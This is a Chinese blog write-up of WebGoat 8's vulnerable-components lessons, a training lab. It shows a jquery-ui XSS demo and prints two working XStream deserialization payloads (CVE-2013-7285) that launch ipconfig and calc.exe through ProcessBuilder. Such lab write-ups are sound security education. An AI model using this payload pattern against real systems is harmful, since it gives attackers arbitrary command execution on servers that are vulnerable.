2021-09-24

最新推荐文章于 2023-11-13 14:48:37 发布
最新推荐文章于 2023-11-13 14:48:37 发布
阅读量1.7k 收藏 6
点赞数 3
分类专栏: webgoat通关 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42315376/article/details/120449520
版权

webgoat 8 通关A9:vulnerable components

最近在做webgoat8 的通关,记录一下感觉比较有意思(花时间最长)的一关

一、lesson 5

这个没什么好说的,xxs攻击里,告诉我们有的组件可以被黑客简单的攻击,有的组件却不可以。
在这里插入图片描述
jquery-ui:1.10.4这个版本的组件有xxs漏洞,点击按钮,可以看到有弹框。在这里插入图片描述
jquery-ui:1.12.0这个版本的组件没有这个漏洞,点击按钮不会出现弹框。
在这里插入图片描述

二、lesson 12

1.破解的辛酸史

一开始都没有看懂这个题目的具体要求,于是打开了百度,直接搜。看到网上的payload大概明白了要干什么。写一个payload当Contact里面任何一个方法就会执行payload。网上白嫖的一个payload,当时就很疑惑为什么是在java.lang.Comparable下面。

<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>ipconfig</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>

没想这么多,先提交进去试一试,错了。。一直说我的payload无法反序列化。。。
在这里插入图片描述
然后傻傻的我就一头钻进解决这个不能反序列化的牛角尖里。花费了一整天的时间,毫无进展。第二天我打开源码看了看,并没有什么特别的啊。但是看到了一个网址https://x-stream.github.io/CVE-2013-7285.html
于是就点进去看看。

2.终于找到出路

点进去这个页面,敏锐的我一眼看到了
在这里插入图片描述

<contact class='dynamic-proxy'>
  <interface>org.company.model.Contact</interface>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>

贴到webgoat里面,还是报错仔细一看接口的包名没写对,替换成webgoat要求的包名。
在这里插入图片描述
点击提,弹出计算机的窗口,成功破解。
在这里插入图片描述
目前整个的通关已经写完,有时间还会写其他部分的通关攻略。

Hebe-123
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnerable-components-workshop
06-11
易损组件研讨会 价值 库、框架和其他软件模块等组件几乎总是以完全权限运行。 如果利用易受攻击的组件,此类攻击可能会导致严重的数据丢失或服务器接管。 使用具有已知漏洞的组件的应用程序可能会破坏应用程序防御并引发一系列可能的攻击和影响。 - 在本次研讨会之后,参与者将意识到潜在易受攻击的组件对其应用程序的安全性构成的风险。 他们将熟悉漏洞披露的基本来源,并能够找出他们使用的组件版本是否存在任何已知问题。 他们应该了解通过第三方组件防止漏洞的基本策略。 技能等级 初学者 要求 Java编程基础知识 对于动手部分: JDK 1.6+ Maven 3 大体时间 无需动手以良好的速度:30 分钟 使用动手选项:60 分钟
webgoat-Vulnerable Components 脆弱的组件
seanyang_的博客
11-05 395
现代应用程序中的开源消费有所增加。开源是从许多具有不同质量标准的不同存储库中获得的。有关漏洞的安全信息散落在各处。许可证信息通常难以验证。大多数团队没有组件升级策略。开源组件是新的攻击媒介。
webgoat靶场需要自行搭建
01-19
webgoat靶场需要自行搭建
webgoat全关教程手册
热门推荐
黑白的博客
11-08 4万+
Webgoat&Webwolf owaspbwa里面的两个服务 搭建 先要安装jdk、WebgoatWebwolf WebgoatWebwolf jdk1.8不支持了,需要安装jdk11 去git上下载WebgoatWebwolf https://github.com/WebGoat/WebGoat/releases/tag/v8.0.0.M26 去oracle官网下载JDK https://www.oracle.com/java/technologies/javase-jdk11-down
Webgoat学习笔记
swordheart的博客
04-26 2623
0x00 安装 WebGoat的版本区别 WebGoat是一个渗透破解的习题教程,分为简单版和开发版,GitHub地址. 简单版安装 简单版是个JAVA的Jar包,只需要有Java环境,然后在命令行里执行 1 2 3 <code>#!bash java -jar webgoat-container-7.0.1-war-exec.jar </code> 然后就可以访问"127.0.0.1
WebGoat攻略 for Mac(6)
qq_42955000的博客
04-20 475
WebGoat攻略 for Mac(6)一、题目攻略A9.Vulnerable Components(易损组件)1.Vulnerable Components(易损组件)A8:2013.Request Forgeries(请求伪造)1.Cross-Site Request Forgeries(CSRF)(跨站点请求伪造)2.Server-Side Request Forgery(服务器请求伪造)Client side(客户端)1.Bypass front-end restrictions(绕过前端限制)2.
解读 CVSS 通用评分系统中最具争议的 Scope
个人笔记
03-28 3077
CVSS, Common Vulnerability Scoring System, 即通用漏洞评分系统,简言之就是一个对安全漏洞进行打分的标准。网络安全人员按照 CVSS 评分的维度对漏洞打分,截至到今天,CVSS 已经升级到 3.1 版本。实际上 CVSS 评分还有一些令人模糊的灰色地带,尤其是最具争议的 Scope,本次就在这里解读一下关于 Scope,到底该不该 Changed。
WebGoat通关攻略
weixin_45539802的博客
01-06 2万+
WebGoat通关攻略 目录WebGoat通关攻略前言一、环境配置1.Docker配置2.WebGoat获取3.WebGoat连接二、通关攻略(建设中)1.Introduction2.General3.Injection4.Broken Authentication5.Sensitive Data Exposure6.XML External Entities(XXE)7.Broken Access Control8.Cross-Site Scripting(XSS)9.Insecure Deseriali
Web安全攻防靶场之WebGoat - 2
DarkN0te
02-24 1429
文章目录概述使用Cross-Site Scripting (XSS)Cross Site ScriptingStage 2Stage 7Stage 10Stage 11Stage 13Access Control FlawsInsecure Direct Object ReferencesStage 2Stage 3Stage 4Stage 5Missing Function Level Acce...
WebGoat JAVA反序列化漏洞分析复现
leah126的博客
03-09 588
该方法代码如下,首先第6行进行传参token,跟到第10行,在进行反序列化对象创建的时候,进行了base64解码并返回到ois变量。但根据上面的代码分析也得知需要在提交之后,会进行base64解码,所以需要提前加密,但是像这种序列化数据直接copy出来并加密的话。为此写了加密的小工具。进行简单分析一波之后,使用ysoserial生成序列化的payload,这里的话不做过多讲解,具体使用应该大家都会。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
HDU-Coder-X#Daily-question-of-Leetcode#2021-09-24-430. 扁平化多级双向链表
07-25
示例 1:输出:[1,2,3,7,8,11,12,9,10,4,5,6]输入的多级列表如下图所示:扁平化后的链表如下图:示例 2:输出:[1,3,2]解释:输入
5G+工业互联网典型应用场景及行业实践[2021-09-24](21页).pdf
05-18
5G+工业互联网典型应用场景及行业实践[2021-09-24](21页).pdf
kk 2021-06-08 09-53-24.mp4
06-08
91谷歌视频设置
2021-2022收藏资料艺术学概论课程基于网络考核改革试2013-09-24-09-37-03.doc
09-25
教育精品资料
Pipeline-Trigger-2021-03-09T15-24-23.659Z:为工具链创建
03-09
App4UITest 用于功能性End2End系统测试 部署和测试用Jade编写的节点应用程序
这可能是你入门java安全最好的练习靶场!
一个安全研究员
02-17 3848
真的香
webgoat通关汇总文章
最新发布
seanyang_的博客
11-13 693
这个版本的webgoat按照owasp2021的top10内容设计的,汇总了webgoat通关的所有文章,
『Java安全』XStream 1.4-1.4.6&1.4.10反序列化漏洞CVE-2013-7285复现与浅析
Ho1aAs‘s Blog
08-12 1756
# 漏洞简介 当XStream反序列化了一个动态代理类,再调用该动态代理类所声明的接口的方法时,就能够触发任意命令执行 > XStream序列化和反序列化分析:https://ho1aas.blog.csdn.net/article/details/126250860 > 动态代理:https://ho1aas.blog.csdn.net/article/details/121647387 # 影响版本 XStream 1.4-1.4.6、1.4.10............
Web安全:WebGoat || VulApps 靶场搭建( 靶场漏洞测试和练习)
网络安全领域___专研者.
06-16 2289
WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞WebGoat运行在带有 java 虚拟机的平台之上,包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效、危险的HTML注释等等。 Vulapp收集各种漏洞环境,为方便使用,统一采用 Dockerfile 形式,同时也收集了安全工具环境.
结果是这样的,没有根据id排:start_date end_date 0 2020-01-15 2020-04-27 1 2020-09-30 2020-10-10 2 2021-02-07 2021-02-22 3 2021-03-06 2021-03-24 4 2020-01-21 2020-03-03 .. ... ... 639 2021-03-09 2021-03-18 640 2021-03-24 2021-04-01 641 2020-01-12 2020-04-19 642 2021-02-09 2021-02-18 643 2020-01-18 2020-03-09
06-03
如果你想根据企业id对结果进行排序,可以在输出结果之前加上一行代码: ```python result = result.sort_values(by=['id']) ``` 此代码将会根据id对结果进行排序,使得每个企业的结果排在一起。完整的代码如下: ```python mean = DataFrame.groupby(['id'])['amount'].mean() # 列出每个企业用电量低于均值时间超过一周的时间段,标记起始时间和结束时间,省略中间时间 filtered_data = DataFrame[DataFrame['amount'] < DataFrame['id'].map(mean)] filtered_data['date'] = pd.to_datetime(filtered_data['date']) filtered_data['diff'] = filtered_data.groupby('id')['date'].diff().dt.days filtered_data['period'] = (filtered_data['diff'] > 1).cumsum() # 找出连续时间段,并计算起始时间和结束时间 result = filtered_data.groupby(['id', 'period']).agg(start_date=('date', 'min'), end_date=('date', 'max')) result = result[result['end_date'] - result['start_date'] > pd.Timedelta(days=7)].reset_index(drop=True) # 根据id排序输出结果 result = result.sort_values(by=['id']) print(result) ``` 输出结果将会按照企业id进行排序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值